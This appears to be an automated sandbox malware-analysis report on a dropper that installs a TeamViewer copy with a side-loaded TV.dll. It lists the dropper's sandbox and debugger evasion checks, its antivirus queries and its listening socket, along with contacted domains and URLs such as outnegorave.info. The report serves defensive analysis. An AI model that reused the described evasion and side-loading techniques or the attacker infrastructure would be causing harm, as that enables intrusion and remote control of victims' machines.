Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,

3_2_6EAFB0A0

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 6_2_004FFF68

6_2_004FFF68

Contains functionality to query network adapater information

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,		6_2_004B9A29
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetAdaptersInfo,		6_2_6EAF82F0

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00405E61 FindFirstFileA,FindClose,	1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040263E FindFirstFileA,	1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	3_2_6EAF28B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	3_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,	6_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,	6_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	6_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	6_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	8_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	8_2_6EAF2DF0

Source: svchost.exe, 00000005.00000002.524751408.000002B018262000.00000004.00000001.sdmp	Binary or memory string: $@Hyper-V RAW
Source: svchost.exe, 00000005.00000002.510529267.000002B012C29000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.281567558.0000000000BB8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.509723909.000001E20B602000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000009.00000002.510137559.000001E20B640000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.510416688.0000024BA4E29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Open window title or class name: ollydbg

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_0053496B

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,

3_2_6EAFB0A0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405E88

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF2000 GetSecurityInfo,GetNamedSecurityInfoA,GetProcessHeap,HeapAlloc,CreateWellKnownSid,SetEntriesInAclA,SetSecurityInfo,SetNamedSecurityInfoA,GetProcessHeap,HeapFree,

3_2_6EAF2000

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6EAFC1E2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0051523A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0053496B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00534A9B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6EAFC1E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_6EAFC1E2

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected

Source: C:\Windows\SysWOW64\svchost.exe

Section loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll

Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF5130 LogonUserW,GetLastError,CloseHandle,

3_2_6EAF5130

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF3390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle,

3_2_6EAF3390

Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	3_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetLocaleInfoA,_xtoa_s@20,	6_2_0054113A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetLocaleInfoA,	6_2_0054E79D
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	6_2_0054E87F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	6_2_0054E915
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetLocaleInfoA,	6_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_0054E987
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_0054EB57
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_0054EC16
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	6_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	6_2_6EAF6D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	8_2_6EAF6D50

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_0054B459

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,753CA680,lstrcat,lstrlen,

1_2_00405B88

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashedWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,

3_2_6EAF8510

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

AV process strings found (often used to terminate AV products)

Source: svchost.exe, 0000000E.00000002.510485370.000001B2F323D000.00000004.00000001.sdmp	Binary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510602015.000001B2F3302000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 6_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

6_2_00511D6F

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
178.255.154.140	unknown	Austria	42473	AS-ANEXIAANEXIAInternetdienstleistungsGmbHAT	false
172.67.205.33	outnegorave.info	United States	13335	CLOUDFLARENETUS	false
185.188.32.25	master15.teamviewer.com	Germany	43304	TEAMVIEWER-ASDE	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
outnegorave.info	172.67.205.33	true
master15.teamviewer.com	185.188.32.25	true
ping3.dyngate.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=10000002	false	Avira URL Cloud: safe	unknown
http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGate	false	Avira URL Cloud: safe	unknown
http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001	false		high
http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001	false	Avira URL Cloud: safe	unknown
http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001	false		high
http://master15.teamviewer.com/din.aspx?s=39260719&client=DynGate&p=10000002	false		high
http://master15.teamviewer.com/dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V	false		high
http://master15.teamviewer.com/dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL	false		high
https://outnegorave.info/B8C631A8/	false	Avira URL Cloud: safe	unknown
http://master15.teamviewer.com/dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip	false		high
http://master15.teamviewer.com/din.aspx?s=39260736&client=DynGate&p=10000002	false		high

AV Detection:

Multi AV Scanner detection for submitted file

Source: 77Etc0bR2v.exe	Virustotal: Detection: 37%			Perma Link
Source: 77Etc0bR2v.exe	ReversingLabs: Detection: 37%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll

ReversingLabs: Detection: 26%

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.77Etc0bR2v.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8,	6_2_0049B32E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8,	6_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_006F605B CryptReleaseContext,	6_2_006F605B

Privilege Escalation:

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Jump to behavior

DLL planting / hijacking vulnerabilities found

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WINMM.dll
